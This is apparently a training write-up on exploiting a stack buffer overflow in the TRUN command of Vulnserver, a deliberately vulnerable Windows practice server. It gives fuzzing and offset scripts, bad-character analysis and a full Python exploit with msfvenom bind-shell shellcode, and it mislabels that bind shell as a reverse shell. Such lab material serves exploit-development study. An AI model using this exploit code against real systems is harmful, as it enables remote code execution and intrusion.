Vulnserver - TRUN Command

As part of my preparation for the taking the CTP course and OSCE exam I used the vulnserver.exe to practice and develop my skills.

1. Intro

Vulnserver is a Windows based threaded TCP server application that is designed to be exploited. The program is intended to be used as a learning tool to teach about the process of software exploitation, as well as a good victim program for testing new exploitation techniques and shellcode.

Figure 1

You can get a copy of the application here https://github.com/zflemingg1/OSCE/tree/master/Vulnserver

2. The Setup

OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation

Vulnserver - Link above
python 2.7 x86, pydbg 32-bit binary, python wmi, pywin32
Immunity Debugger with mona installed
Kali 2.0 with Boofuzz fuzzer

2.1 Interface

Using netcat connect to X.X.X.X:9999 and issue the HELP command to confirm that everything is working as expected:

Figure 2

3. Fuzzing

For the purpose of this tutorial we will be focusing on fuzzing the TRUN command. Observing that the valid argument structure for the TRUN command is roughly <trun>[space]<command_value> we can try sending TRUN hello as a test and see if it’s accepted.

Figure 3

Figure 4

As can bee seen above, the command and argument executed successfully. Now that we have confirmed the structure of a command and its arguments, we can start fuzzing this command to see if we can get the program to crash when submitting various argument values to the TRUN command.

The following BOOFUZZ template was created to fuzz the TRUN command in an effort to get the program to crash.

from boofuzz import *

host = '192.168.109.129'
port = 9999


	
session = Session(
	sleep_time = 0.5,
	target=Target(
	connection=SocketConnection(host, int(port), proto='tcp')
	)
)
	
s_initialize("TRUN")
s_string("TRUN", fuzzable = False)	
s_delim(" ", fuzzable = False)		
s_string("FUZZ")
    
session.connect(s_get("TRUN"))
session.fuzz()

3.1 Crash

The following command appears to have crashed the program indicating that the "TRUN" command can be manipulated to force the program to crash.

Figure 5

Figure 6

3.2 Analysing The Crash

Based on the TCP stream (Figure 5), the number of bytes that was sent by the fuzzer and that caused the crash was around 5000 bytes.

To gain a better understanding of this, the following template was used to identify the length needed to overflow the TRUN command and cause the crash:

import socket
from time import sleep

count = 6000
 
while count >=10:

	TCP_IP = '192.168.109.129'
	TCP_PORT = 9999
	
	payload = "TRUN /.:/"
	payload += "A" * count
	
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((TCP_IP, TCP_PORT))
		s.settimeout(4.0)
		s.recv(1024)
	
	except:
		print("\nCrash Occured When Sending: {}".format(count))
		exit()

	s.send(payload)
	s.close()	
	
	count = count - 10
	print("Sending Message! - Count:" + str(count))
	s.close()
	print("Message Sent! - Count:" + str(count))
	sleep(3)

Figure 6

Figure 7

As can be seen from figure 6 the program crashes when a string of 5990 chars is sent. Checking the dump using immunity it can be seen that we control a buffer of length 2990 bytes - Figure 7.

4. Determine Offset

Using msf-pattern_create create a pattern of length 2990 bytes.

Figure 8

Update the exploit and execute it

import socket
from time import sleep




TCP_IP = '192.168.109.129'
TCP_PORT = 9999
	
payload = "TRUN /.:/"
payload += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv"
	

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
	


s.send(payload)
s.close()	

Figure 9

4.1 Get Offset

Using msf-pattern_offset and the value 386F4337 (Figure 9 EIP Value) we can determine our exact offset.

Figure 10

4.2 Confirm Offset

Restart the application in immunity and execute the updated POC below

import socket
from time import sleep

TCP_IP = '192.168.109.129'
TCP_PORT = 9999
	
payload = "TRUN /.:/"
payload += "A" * 2003
payload += "B" * 4   # EIP
payload += "C" * (5990 - len(payload))
	
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))

s.send(payload)
s.close()	

Figure 11

As can be seen from Figure 11, we can successfully control EIP. It can also be observed that the buffer of C’s is located directly after the 4 bytes of B’s. This means that we will be able to simply place our shellcode right after the 4 bytes of B’s.

5. Bad Character Analysis

Clone the https://github.com/zflemingg1/OSCE/tree/master git repository and configure the dependency package as instructed.

5.1 Modifying The Script

Outlined below are the changes you will need to make:

# Modify lines 35 - 40 to be the same as below
'''
    INSERT THE REQUEST TEMPLATE HERE - NEEDS TO BE MODIFIED EVERY TIME
'''
request_template = (
    "TRUN /.:/{}"
)

Figure 12

# Modify Lines 46 and 56 to be the same as below

iteration = 0
processName = "vulnserver.exe" # name of the process as it appears in tasklist
executable = r"C:\Documents and Settings\Administrator\My Documents\Downloads\vulnserver\vulnserver.exe" # path the executable to start the process
start_buffer_address = "\x0c\xfa\xb7\x00" # Take this value straight from immunity
start_buffer_address_offset = 0x04 # The offset you want to read. Note this will typically be 4
seh_violation = False # Change me depending on crash occuring in seh handler 
listeningPort = 9999 # Address of the listening process
crashLoad = "A" * 2003 + "B" * 4 + "{}" + "C" * 3970 # load to crash the proces with {} representing where our test chars will go
responsive_test_string = "HELP"
crash_wait_timeout = 10 # seconds to wait after a payload has been sent
service_responsive_timeout = 10

5.2 Results

Execute the script. Once finished you should have identical results to those outlined below in Figure 13.

Figure 13

Figure 14

As can be seen from Figure 14, '\x00' is the only bad character.

6. Redirecting Execution Flow

As can be seen from Figure 13 all the expected characters (\x01 to \xFF) are accepted. This means that the only bad character was the NULL byte (\x00 - Figure 14). The next step was to find an address that contains a JMP ESP instruction. ]

NOTE: It’s always recommended to use an address from the application itself, or a DLL that comes with the application for compatibility purposes. I.E. the exploit will work even if the application was installed on a different machine. For Vulnserver.exe we can look at the DLL that comes with it (essfunc.dll).

Restart the application in Immunity and execute the following command !mona jmp -r esp -m "essfunc.dll".

Figure 15

Take note of the address highlighted in the above picture (0x625011AF)

6.1 Taking Control of EIP

Restart the application in Immunity, set a breakpoint at address 0x625011AF and execute the updated POC below

import socket
import struct

TCP_IP = '192.168.109.129'
TCP_PORT = 9999
	
payload = "TRUN /.:/"
payload += "A" * 2003
payload += struct.pack("<I",0x625011AF) # EIP
payload += "C" * (5990 - len(payload))

	
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))

s.send(payload)
s.close()	

Figure 16

Step through the breakpoint using F7 and you will land in the C buffer - Figure 17.

Figure 17

7. Generating Shellcode

Using all the information that we've gathered we can now generate the payload as shown below:

msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f python -v shellcode

Figure 18

7.1 Getting Shell

Restart the application and execute the updated POC shown below:

import socket
import struct

TCP_IP = '192.168.109.129'
TCP_PORT = 9999

shellcode =  b""
shellcode += b"\xda\xca\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x53"
shellcode += b"\xb8\x82\xdb\x7a\xc4\x83\xc7\x04\x31\x47\x13"
shellcode += b"\x03\xc5\xc8\x98\x31\x35\x06\xde\xba\xc5\xd7"
shellcode += b"\xbf\x33\x20\xe6\xff\x20\x21\x59\x30\x22\x67"
shellcode += b"\x56\xbb\x66\x93\xed\xc9\xae\x94\x46\x67\x89"
shellcode += b"\x9b\x57\xd4\xe9\xba\xdb\x27\x3e\x1c\xe5\xe7"
shellcode += b"\x33\x5d\x22\x15\xb9\x0f\xfb\x51\x6c\xbf\x88"
shellcode += b"\x2c\xad\x34\xc2\xa1\xb5\xa9\x93\xc0\x94\x7c"
shellcode += b"\xaf\x9a\x36\x7f\x7c\x97\x7e\x67\x61\x92\xc9"
shellcode += b"\x1c\x51\x68\xc8\xf4\xab\x91\x67\x39\x04\x60"
shellcode += b"\x79\x7e\xa3\x9b\x0c\x76\xd7\x26\x17\x4d\xa5"
shellcode += b"\xfc\x92\x55\x0d\x76\x04\xb1\xaf\x5b\xd3\x32"
shellcode += b"\xa3\x10\x97\x1c\xa0\xa7\x74\x17\xdc\x2c\x7b"
shellcode += b"\xf7\x54\x76\x58\xd3\x3d\x2c\xc1\x42\x98\x83"
shellcode += b"\xfe\x94\x43\x7b\x5b\xdf\x6e\x68\xd6\x82\xe6"
shellcode += b"\x5d\xdb\x3c\xf7\xc9\x6c\x4f\xc5\x56\xc7\xc7"
shellcode += b"\x65\x1e\xc1\x10\x89\x35\xb5\x8e\x74\xb6\xc6"
shellcode += b"\x87\xb2\xe2\x96\xbf\x13\x8b\x7c\x3f\x9b\x5e"
shellcode += b"\xe8\x37\x3a\x31\x0f\xba\xfc\xe1\x8f\x14\x95"
shellcode += b"\xeb\x1f\x4b\x85\x13\xca\xe4\x2e\xee\xf5\x1b"
shellcode += b"\xf3\x67\x13\x71\x1b\x2e\x8b\xed\xd9\x15\x04"
shellcode += b"\x8a\x22\x7c\x3c\x3c\x6a\x96\xfb\x43\x6b\xbc"
shellcode += b"\xab\xd3\xe0\xd3\x6f\xc2\xf6\xf9\xc7\x93\x61"
shellcode += b"\x77\x86\xd6\x10\x88\x83\x80\xb1\x1b\x48\x50"
shellcode += b"\xbf\x07\xc7\x07\xe8\xf6\x1e\xcd\x04\xa0\x88"
shellcode += b"\xf3\xd4\x34\xf2\xb7\x02\x85\xfd\x36\xc6\xb1"
shellcode += b"\xd9\x28\x1e\x39\x66\x1c\xce\x6c\x30\xca\xa8"
shellcode += b"\xc6\xf2\xa4\x62\xb4\x5c\x20\xf2\xf6\x5e\x36"
shellcode += b"\xfb\xd2\x28\xd6\x4a\x8b\x6c\xe9\x63\x5b\x79"
shellcode += b"\x92\x99\xfb\x86\x49\x1a\x1b\x65\x5b\x57\xb4"
shellcode += b"\x30\x0e\xda\xd9\xc2\xe5\x19\xe4\x40\x0f\xe2"
shellcode += b"\x13\x58\x7a\xe7\x58\xde\x97\x95\xf1\x8b\x97"
shellcode += b"\x0a\xf1\x99"
	
payload = "TRUN /.:/"
payload += "A" * 2003
payload += struct.pack("<I",0x625011AF) # EIP
payload += "\x90" * 8
payload += shellcode
payload += "C" * (5990 - len(payload))

	
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))

s.send(payload)
s.close()	

NOTE: A nopsled (8 NOP instructions) were added before the shellcode to give room for the decoder to work

Using netcat, connect to the target host using port 4444 and you should now have a reverse shell:

Figure 19